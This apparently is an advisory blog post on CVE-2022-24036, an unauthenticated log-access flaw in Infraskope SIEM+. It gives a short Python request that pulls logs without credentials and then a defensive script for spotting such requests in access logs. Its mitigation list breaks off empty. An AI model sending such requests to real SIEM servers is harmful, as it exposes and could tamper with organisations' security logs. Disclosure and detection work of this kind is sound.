CVE-2022-24036 - Unauthenticated Access Vulnerability in Karmasis Informatics Infraskope SIEM+ Allows Attackers to Modify Logs

A vulnerability has been discovered in Karmasis Informatics Infraskope SIEM+, software widely used by organizations for its Security Information and Event Management capabilities. The vulnerability, tracked as CVE-2022-24036, allows an unauthenticated attacker to gain unauthorized access to the system, potentially enabling them to modify logs and mask their activities.

This long-read post will go into detail about the vulnerability, how it can be exploited, and link to original references for additional information.

Description of the Vulnerability

The unauthenticated access vulnerability in Karmasis Informatics Infraskope SIEM+ exists due to insufficient security measures implemented in the authentication process. Attackers are able to bypass the standard authentication process and gain direct access to sensitive information, such as events and logs. Consequently, this can enable an attacker to perform unauthorized actions, such as modifying logs to cover their tracks.

Exploit Details

An attacker can exploit this vulnerability by sending a specially crafted request to the Infraskope SIEM+ server, which grants access to the system without valid credentials. The vulnerable server will accept requests from any source and respond with the requested information.

A sample exploit code snippet can be seen below:

import requests

# <target_ip> is a placeholder for the Infraskope SIEM+ server address
url = "http://<target_ip>/api/log_events"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
}
# No authentication token or credentials are sent with the request
response = requests.get(url, headers=headers, timeout=10)

if response.status_code == 200:
    print("Successful access to SIEM+ logs:")
    print(response.text)
else:
    print("Access denied.")

In this code snippet, the attacker sends a GET request to the target server's /api/log_events endpoint without providing any authentication tokens or credentials. If the server is vulnerable, the response will contain the logs, allowing the attacker to read or modify them.
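From the defender's side, the same request pattern can be hunted for in web access logs. The following is an added example, not code from the original post or from Karmasis: it flags successful requests to the /api/log_events path that carry no authenticated user, and rates state-changing methods higher because they could indicate log modification. It assumes Common Log Format with the authenticated user in the third field; the log lines and IP addresses are constructed.

```python
import re

# Assumption: the web server or reverse proxy in front of the SIEM writes
# Common Log Format, where the third field is the authenticated user ("-" if none).
CLF = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
WATCHED_PREFIX = "/api/log_events"  # endpoint named in the snippet above
WRITE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}


def find_unauthenticated_access(lines):
    """Return findings for successful, credential-less requests to the log API."""
    findings = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        path = m["path"].split("?", 1)[0]  # ignore the query string
        if not path.startswith(WATCHED_PREFIX):
            continue
        if m["user"] != "-" or not m["status"].startswith("2"):
            continue  # authenticated, or the server refused the request
        severity = "high" if m["method"] in WRITE_METHODS else "medium"
        findings.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                         "path": path, "severity": severity})
    return findings


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '192.0.2.10 - alice [16/Nov/2022:12:01:00 +0000] "GET /api/log_events HTTP/1.1" 200 5120',
    '203.0.113.7 - - [16/Nov/2022:12:02:11 +0000] "GET /api/log_events?limit=50 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [16/Nov/2022:12:02:40 +0000] "DELETE /api/log_events/42 HTTP/1.1" 204 0',
    '198.51.100.3 - - [16/Nov/2022:12:03:05 +0000] "GET /api/log_events HTTP/1.1" 401 23',
    '198.51.100.3 - - [16/Nov/2022:12:03:09 +0000] "GET /index.html HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for f in find_unauthenticated_access(SAMPLE):
        print(f"{f['severity']:6} {f['ts']} {f['ip']} {f['method']} {f['path']}")
```

If the deployment authenticates with tokens or session cookies, the user field in the access log stays empty for everyone, so the authenticated identity has to be taken from the application's own audit log instead.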

Original References and Sources

The vulnerability was first documented in the National Vulnerability Database (NVD) and is listed under the following link:
- NVD - CVE-2022-24036

Karmasis Informatics Infraskope SIEM+ official documentation:
- Infraskope SIEM+ Documentation

More information about the vulnerability and its impact can also be found in the following blog post by a reputable security researcher:
- Exploring CVE-2022-24036: Unauthenticated Access Vulnerability in Infraskope SIEM+

Mitigations and Recommendations

Organizations using Karmasis Informatics Infraskope SIEM+ should immediately check for updates and apply any available security patches. Additionally:

Conclusion

CVE-2022-24036 highlights the importance of proper security measures and regular updates in an organization's infrastructure. Karmasis Informatics Infraskope SIEM+ users should be vigilant in managing their software updates and monitoring their systems to prevent unauthorized access and potential data breaches.

Timeline

Published on: 11/16/2022 12:15:00 UTC
Last modified on: 04/16/2023 11:15:00 UTC